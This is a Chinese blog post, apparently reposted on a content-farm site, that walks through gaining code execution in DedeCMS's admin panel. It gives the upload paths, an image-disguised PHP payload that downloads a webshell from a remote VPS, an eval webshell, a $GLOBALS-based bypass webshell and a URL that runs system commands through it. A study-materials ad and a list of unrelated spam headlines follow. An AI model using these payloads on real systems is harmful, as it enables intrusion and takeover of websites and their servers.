当前位置: 首页 > news >正文

免费网站建设网站推广万网怎么发布网站

免费网站建设网站推广,万网怎么发布网站,八大电商平台是哪几家,儿童教育网站源码前言 刚发现Dedecms更新了发布版本,顺便测试一下之前的day有没有修复,突然想到了新的tricks去实现RCE。 文章发布的时候估计比较晚了,一直没时间写了。 利用 /uploads/dede/article_string_mix.php /uploads/dede/article_template_rand.…

前言

刚发现Dedecms更新了发布版本,顺便测试一下之前的day有没有修复,突然想到了新的tricks去实现RCE。

文章发布的时候估计比较晚了,一直没时间写了。

利用

/uploads/dede/article_string_mix.php
/uploads/dede/article_template_rand.php
/uploads/dede/sys_task.php
......

我发布的文档->>>>添加文档->>>>站内选择进行文件上传

/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)
/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives

image-20230728094845280

文件上传

image-20230728094856782

在vps上起一个http的服务,端口设置为8016

image-20230728094909452

远程服务器存放shell.php,文件内容为

<?php @eval ($_POST ['a']);?>

准备一个图片格式的文件,文件内容为,这里我上传的文件名称为f.png

<? copy("http://192.168.225.40:8016/shell.php","shell.php");?>

上传成功后可以看到上传的图片的位置

img

修改文件名为b.php

image-20230728095102010

保存发现png图片已成功被更改,访问b.php,从远程vps下载了shell.php,当前目录下存在一个名称为shell.php的木马文件

image-20230728095304075

image-20230728095321926

利用webshell进行命令执行。

image-20230728095349684

成功执行了命令

‍帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

思考

如果不考虑文件上传后缀名绕过方法,仅以上面图片格式的文件上传的话,那么无所谓上传的什么内容,因为本身来讲dede的代码中对文件内容是做的有校验的

image-20230728100238554

所以文件内有两种绕过方法

  • 正则绕过
  • disable函数绕过

简单搜索了一下各个平台的文章,其实是有师傅正则绕过实现webshell的。第二点儿,disable函数绕过,往前几个版本,有兴趣的可以看一下源码,之前利用全局变量Globals绕过

image-20230728101122230

代码内容

<?php
$a = $GLOBALS["_GET"];
$b = $GLOBALS["_GET"];
$a['test1']($b['test2'])
?>

image-20230728101156144

命令执行

http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);

image-20230728102212211

成功执行命令,且该命令执行为未授权命令执行。

所以在官方前几个版本中已经更新了,添加进了禁用方法

image-20230728101530314

所以在绕过禁用方法上来讲更容易一点儿。所以在利用上这里利用了copy函数的特性,那么这里提醒一下,其它的函数当然也可以满足效果。

http://www.yayakq.cn/news/292323/

相关文章:

  • 深圳网站建设 设计创公司百度助手免费下载
  • 桂林网站建设培训wordpress网站自动伪原创
  • 怎么样做网站才可以加重权重自己公司网站维护
  • 福州网站设计服务高端网站开发哪家强
  • 肇庆建设银行招聘网站做单抗药的看什么网站好
  • 阿里巴巴如何建设网站首页福田蒙派克e质量怎么样
  • 做电商网站的框架结构图网站后台管理系统制作
  • 小米果怎么做视频网站wordpress添加qq交谈
  • 做外贸怎样浏览国外网站大数据营销公司
  • 商务网站建设与维护(专21春)营销型网站建设一般包含哪些内容
  • 广东网站建设服务国际新闻今天最新消息
  • 网站建设实施计划包括哪些重庆建一科技发展有限公司
  • 深圳网站搭建哪里好网络营销方式对比
  • 网站做百度地图定位深圳app开发哪家专业
  • 阿里巴巴国际站买家版app设计开发流程
  • php网站中水印怎么做网站google搜索优化
  • 制作网站用什么代码市场监督管理局职责
  • 七台河新闻头条潍坊网站排名优化
  • 网上销售有哪些方法seo优化专员工作内容
  • 淮南建设公司网站昆明网站建设系统有哪些
  • wordpress网站迁移教程猪八戒网仿照哪个网站做的
  • 嘉兴做网站公司哪家好工业产品设计图
  • wordpress 仿站 教程山西住房城乡建设部网站
  • 15.下面对网站结构描述正确的是( )公司网站模板 免费
  • 湛江网站建站建设程序界面设计
  • 类似一起做网站的网站大学个人网站期末作业
  • seo和网站建设那个先学做淘宝客需要自己建网站吗
  • 泉州企业网站制作定制做网站的客户哪里找
  • 桥梁建设设计网站wordpress md风格
  • 手机网站管理工具黑龙江省建设集团网站